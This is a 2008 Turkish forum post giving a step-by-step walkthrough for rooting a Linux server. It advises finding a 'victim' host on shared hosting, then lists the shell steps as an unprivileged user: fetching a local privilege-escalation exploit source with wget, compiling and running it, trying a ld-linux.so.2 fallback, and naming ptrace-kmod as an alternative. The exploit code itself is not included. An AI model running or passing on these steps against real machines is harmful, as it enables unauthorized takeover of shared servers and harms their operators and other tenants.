rootlama teknikleri

Konu: rootlama teknikleri Perş. Ağus. 07, 2008 10:03 pm

Linux sistemlerinde yetkili duruma gelmek rootlamak???

Burada kullanacğımız exploit Local exploittir�Bu tür local saldırılar
size bi kardes tavsiyesi(: kendinize bir ftp almak ama kurbanın
hostununda aynı serverda bulunması gerekior� bunu nasıl bulcaz diosanız
www.netcraft.com gibi sitelerden hostlara info çekerek şirket isimlerini görmek ki orada l inklerde veriliyor�ya domaini whois cekmek www.register.com gibi sitelerden bakabilirsiniz�

Öncelikle bizim dosyalarımızı yazabileceğimiz rahat çalışabileceğimiz
bir dizine yani o sıradaki yapılan işlemlerin yazılabileceği bir dizine
ihtiyacımız var� nedir diye sorduğunuzu duyar gibiyim�
Tmp dizini yeterli olur herhalde sorunuza (: devam ediyoruz�

$ cd /tmp

Pwd yapıyoruz�

$ pwd

/tmp (diye bir şey gelecek muhtemelen bizim o dizinde olduğumuzu söylüyor )

Tamam hemen yetkilere göz atıyoruz�

$ id

uid=55554(nobody) gid=55554(nobody) groups=55554(nobody)

bu demektirki bir biz bir hiçiz emin olmak için;

$ whoami

nobody

evet artık emin olduk hiç bir şeyiz hemen exploitimizi çekiyoruz�
$ wget http://example.com/hatorihanzo.c

Download işlemi bittikten sonra hemen;

$ ls

hatorihanzo.c

bu dosyayı gördüyseniz sorun yok demektir.Hemen bu exploiti derleyelim�

$ gcc hatorihanzo.c -o hatorihanzo

Hemen bu exploite çalışma izni verelim (chmod 7777 yapalım yani)

$ chmod +x hatorihanzo

İzin kabul edilmiştir işte geldik kader anına exploiti çalıştıracaz ve exploit sistemi rootlamaya çalısacak�

$ ./ hatorihanzo

Eğer �$� işareti �#� olmuşsa sistemi rootlamışsınızdır�Olmadımı?
Sizimi kırıcam hemen dosya desteği istiyoruz�

$ /lib/ld-linux.so.2 ./hatorihanzo

Root olmuşsanız yani �$� �#� olmuşsa gerisi sizin vicdanınza kalmış
olmamışsa değişik exploitleri kullanın örnek; ptrace-kmod Kolay gelsin�

Not: bu sistemden cıktığınızda her girdiğinizde aynı işlemleri tekrar gerçekleştirerek yine [root] olabilirsiniz�

» Plazma pazarlama teknikleri
» Hizli Okuma ve Yazma Teknikleri (torrent)